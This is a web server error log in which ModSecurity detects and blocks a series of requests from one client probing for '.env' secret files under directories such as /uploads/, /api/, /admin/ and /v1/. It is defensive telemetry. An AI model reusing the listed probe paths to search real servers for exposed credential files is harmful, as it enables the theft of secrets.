[Wed Oct 01 08:38:43.419521 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aNzMc2SEGjAj3vHc8W8gdAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:43.419866 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aNzMc2SEGjAj3vHc8W8gdAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:43.420077 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aNzMc2SEGjAj3vHc8W8gdAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:43.879846 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aNzMc2SEGjAj3vHc8W8gdQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:43.880113 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aNzMc2SEGjAj3vHc8W8gdQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:43.880645 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aNzMc2SEGjAj3vHc8W8gdQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:44.339876 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aNzMdGSEGjAj3vHc8W8gdgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:44.340127 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aNzMdGSEGjAj3vHc8W8gdgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:44.340334 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aNzMdGSEGjAj3vHc8W8gdgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:44.799838 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNzMdGSEGjAj3vHc8W8gdwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:44.800074 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNzMdGSEGjAj3vHc8W8gdwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:44.800278 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNzMdGSEGjAj3vHc8W8gdwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:45.259958 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aNzMdWSEGjAj3vHc8W8geAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:45.260243 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aNzMdWSEGjAj3vHc8W8geAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:45.260462 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aNzMdWSEGjAj3vHc8W8geAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:45.719808 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aNzMdWSEGjAj3vHc8W8geQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:45.720059 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aNzMdWSEGjAj3vHc8W8geQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:45.720277 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aNzMdWSEGjAj3vHc8W8geQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:46.180878 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aNzMdmSEGjAj3vHc8W8gegAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:46.181133 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aNzMdmSEGjAj3vHc8W8gegAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:46.181339 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aNzMdmSEGjAj3vHc8W8gegAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:46.640221 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aNzMdmSEGjAj3vHc8W8gewAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:46.640475 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aNzMdmSEGjAj3vHc8W8gewAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:46.640687 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aNzMdmSEGjAj3vHc8W8gewAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:47.100363 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aNzMd2SEGjAj3vHc8W8gfAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:47.100611 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aNzMd2SEGjAj3vHc8W8gfAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:47.100824 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aNzMd2SEGjAj3vHc8W8gfAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:47.560196 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aNzMd2SEGjAj3vHc8W8gfQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:47.560448 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aNzMd2SEGjAj3vHc8W8gfQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:47.560665 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aNzMd2SEGjAj3vHc8W8gfQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.019490 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8gfgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.019741 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8gfgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.019951 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8gfgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.479223 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8gfwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.479476 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8gfwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.479689 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8gfwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.938892 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8ggAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.939143 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8ggAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:48.939359 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aNzMeGSEGjAj3vHc8W8ggAAAAAA"], referer: https://www.google.com/
